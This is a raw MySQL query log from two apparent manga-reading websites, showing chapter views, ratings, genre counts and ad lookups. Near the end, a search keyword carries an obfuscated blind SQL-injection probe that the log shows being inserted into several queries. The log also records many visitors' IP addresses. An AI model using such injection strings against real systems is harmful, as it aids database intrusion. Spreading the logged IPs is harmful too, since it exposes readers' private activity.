330647316 Quit 330647317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330647317 Quit 330647318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330647318 Quit 330647319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330647319 Quit 330647320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330647320 Quit 330647321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330647321 Quit 330647322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330647322 Quit 330647323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330647323 Quit 330647324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330647324 Quit 330647325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330647325 Quit 330647326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330647326 Quit 330647327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330647327 Quit 330647328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330647328 Quit 330647329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647329 Quit 330647330 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647330 Quit 330647306 Quit 330647331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647331 Query Update chapters set view=view+1 where id = '17258' 330647331 Quit 330647332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647332 Query select * FROM chapters where id = '17258' 330647333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647332 Quit 330647333 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17258' 330647333 Quit 330647334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647334 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '17258', '2804:1b3:9143:b3b1:ac78:55fd:42b0:edb7', 'mangacherri.com', '2026-02-26 03:28:47', '2026-02-26 03:28:47') 330647334 Quit 330647335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647335 Query select * FROM chapter_images where chapter_id = '17258' 330647335 Quit 330647336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647336 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330647337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647337 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330647336 Quit 330646969 Quit 330647338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647338 Quit 330647339 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647339 Quit 330647340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647340 Quit 330647341 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647341 Quit 330647342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647342 Quit 330647343 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647343 Quit 330647344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647344 Quit 330647345 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647345 Quit 330647346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647346 Quit 330647347 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '983' 330647347 Quit 330647348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647348 Query select * FROM chapters where id = '983' 330647348 Quit 330647349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647349 Query select * FROM chapters where manga_id = '31' order by id desc 330647349 Quit 330647350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647350 Query Update chapters set view=view+1 where id = '983' 330647350 Quit 330647351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647351 Query select * FROM chapters where id = '983' 330647351 Quit 330647352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647352 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '983' 330647352 Quit 330647353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647353 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('31', '983', '2605:59c8:8c9:3310:9f7d:b7ce:e8ee:281', 'mangacherri.com', '2026-02-26 03:28:47', '2026-02-26 03:28:47') 330647353 Quit 330647354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647354 Query select * FROM chapter_images where chapter_id = '983' 330647354 Quit 330647355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647355 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '31' and m.active = 1 330647355 Quit 330647356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647356 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='31' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330647337 Quit 330647357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647357 Quit 330647358 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647358 Quit 330647359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647359 Quit 330647360 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647360 Quit 330647361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647361 Quit 330647362 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647362 Quit 330647363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647363 Quit 330647364 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647364 Quit 330647365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647365 Quit 330647366 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10908' 330647366 Quit 330647367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647367 Query select * FROM chapters where id = '10908' 330647367 Quit 330647368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647368 Query select * FROM chapters where manga_id = '197' order by id desc 330647368 Quit 330647369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647369 Query Update chapters set view=view+1 where id = '10908' 330647369 Quit 330647370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647370 Query select * FROM chapters where id = '10908' 330647370 Quit 330647371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647371 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10908' 330647371 Quit 330647372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647372 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '10908', '2409:40e5:2016:544c:8000::', 'mangacherri.com', '2026-02-26 03:28:47', '2026-02-26 03:28:47') 330647372 Quit 330647373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647373 Query select * FROM chapter_images where chapter_id = '10908' 330647373 Quit 330647374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647374 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330647374 Quit 330647375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647375 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330647376 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647377 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647377 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1955' and m.active = 1 330647376 Quit 330647377 Quit 330647378 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647378 Query select * FROM chapters where id = '1955' 330647378 Quit 330647379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647379 Query select * FROM chapters where manga_id = '100' order by display_priority ASC, id desc 330647379 Quit 330647380 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647380 Query Update chapters set view=view+1 where id = '1955' 330647380 Quit 330647381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647381 Query select * FROM chapters where id = '1955' 330647381 Quit 330647382 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647382 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1955' and m.active = 1 330647382 Quit 330647383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647383 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('100', '1955', '114.119.128.39', 'mangaberri.com', '2026-02-26 03:28:47', '2026-02-26 03:28:47') 330647383 Quit 330647384 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647384 Query select * FROM chapter_images where chapter_id = '1955' 330647384 Quit 330647385 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647385 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '100' and m.active = 1 330647386 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647386 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='100' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330647385 Quit 330647386 Quit 330647387 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647388 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647387 Quit 330647388 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647388 Quit 330647389 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647390 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647389 Quit 330647390 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647390 Quit 330647391 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647391 Quit 330647392 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647392 Quit 330647393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647393 Quit 330647394 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647394 Quit 260225 19:28:48 330647356 Quit 330647395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647395 Quit 330647396 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647396 Quit 330647397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647397 Quit 330647398 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647398 Quit 330647399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647399 Quit 330647400 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647400 Quit 330647401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647401 Quit 330647402 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647402 Quit 330647375 Quit 330647403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647403 Quit 330647404 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647404 Quit 330647405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647405 Quit 330647406 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647406 Quit 330647407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647407 Quit 330647408 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647408 Quit 330647409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647409 Quit 330647410 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647410 Quit 260225 19:28:49 330647411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647412 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647411 Quit 330647412 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY (k.id * FLOOR(1 + RAND() * 100000)) % 100000 DESC limit 10 330647412 Quit 330647413 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647413 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 50 330647413 Quit 330647414 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647414 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330647414 Quit 330647415 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647416 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647415 Quit 330647416 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647416 Quit 260225 19:28:50 330647417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647417 Quit 330647418 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5892' 330647418 Quit 330647419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647419 Query select * FROM chapters where id = '5892' 330647419 Quit 330647420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647420 Query select * FROM chapters where manga_id = '111' order by id desc 330647420 Quit 330647421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647421 Query Update chapters set view=view+1 where id = '5892' 330647421 Quit 330647422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647422 Query select * FROM chapters where id = '5892' 330647422 Quit 330647423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647423 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5892' 330647423 Quit 330647424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647424 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('111', '5892', '2804:14d:4ca6:834e:efb5:5349:c4c5:c6c2', 'mangacherri.com', '2026-02-26 03:28:50', '2026-02-26 03:28:50') 330647424 Quit 330647425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647425 Query select * FROM chapter_images where chapter_id = '5892' 330647425 Quit 330647426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647426 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '111' and m.active = 1 330647426 Quit 330647427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647427 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='111' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330647428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647428 Quit 330647429 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4658' and m.active = 1 330647429 Quit 330647430 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647430 Query select * FROM chapters where id = '4658' 330647431 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647431 Query select * FROM chapters where manga_id = '35' order by display_priority ASC, id desc 330647430 Quit 330647431 Quit 330647432 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647432 Query Update chapters set view=view+1 where id = '4658' 330647432 Quit 330647433 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647433 Query select * FROM chapters where id = '4658' 330647433 Quit 330647434 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647434 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4658' and m.active = 1 330647434 Quit 330647435 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647435 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '4658', '75.72.250.102', 'mangaberri.com', '2026-02-26 03:28:50', '2026-02-26 03:28:50') 330647435 Quit 330647436 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647436 Query select * FROM chapter_images where chapter_id = '4658' 330647436 Quit 330647437 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647437 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330647437 Quit 330647438 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647438 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Fantasy%' OR genres like '%Military%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330647438 Quit 330647439 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647440 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647439 Quit 330647440 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647440 Quit 330647441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647441 Quit 330647442 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647442 Quit 330647443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647443 Quit 330647444 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647444 Quit 330647445 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330647445 Quit 330647446 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647446 Quit 330647427 Quit 330647447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647447 Quit 330647448 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647448 Quit 330647449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647449 Quit 330647450 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647450 Quit 330647451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647451 Quit 330647452 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647452 Quit 330647453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647453 Quit 330647454 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330647454 Quit 260225 19:28:51 330647455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647455 Quit 330647456 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1)anD//2356(2727(selEct//CaSe//2356//when//2356//ThEn//1//ELSE//0//EnD//FROM//RdBdatABasE)2727)-- -', '169.150.196.30', '2026-02-26 03:28:51') 330647456 Quit 330647457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647457 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1)anD//2356(2727(selEct//CaSe//2356//when//2356//ThEn//1//ELSE//0//EnD//FROM//RdBdatABasE)2727)-- -%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1)anD//2356(2727(selEct//CaSe//2356//when//2356//ThEn//1//ELSE//0//EnD//FROM//RdBdatABasE)2727)-- -%' ) ) 330647457 Quit 330647458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647458 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\')anD/**/2356=(%27~%27||(selEct/**/CaSe/**/2356/**/when/**/2356/**/ThEn/**/1/**/ELSE/**/0/**/EnD/**/FROM/**/RdB$datABasE)||%27~%27)-- -' 330647458 Quit 330647459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647459 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330647459 Quit 330647460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647460 Quit 330647461 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647461 Quit 330647462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330647462 Quit 330647463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330647463 Quit 330647464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM 